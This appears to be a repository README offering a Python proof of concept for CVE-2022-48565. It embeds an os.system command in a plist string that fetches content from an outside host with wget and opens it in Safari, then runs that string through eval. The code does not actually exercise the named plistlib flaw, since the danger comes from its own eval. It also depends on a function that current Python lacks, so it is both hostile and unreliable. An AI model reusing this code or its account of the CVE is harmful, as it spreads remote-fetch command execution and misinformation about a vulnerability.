README.md
Rendering markdown...
# -*- coding: utf-8 -*-
#####################################
#CVE-2022-48565 POC by Einstein2150 #
#####################################
import plistlib
# Beispiel für eine gefährliche Plist-Datei mit bösartigem Code
malicious_plist = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>run</key>
<string>__import__('os').system('wget http://foto-video-it.de && open -a Safari index.html')</string>
</dict>
</plist>
'''
# Versucht, die bösartige Plist-Datei zu laden
try:
# Deserialisieren der bösartigen Plist-Datei (als String, da readPlistFromBytes nicht existiert)
plist_data = plistlib.readPlistFromString(malicious_plist)
# Dies führt den bösartigen Code aus und lädt die index.html herunter und öffnet sie mit Safari
eval(plist_data['run'])
except Exception as e:
print("Ein Fehler ist aufgetreten: ", e)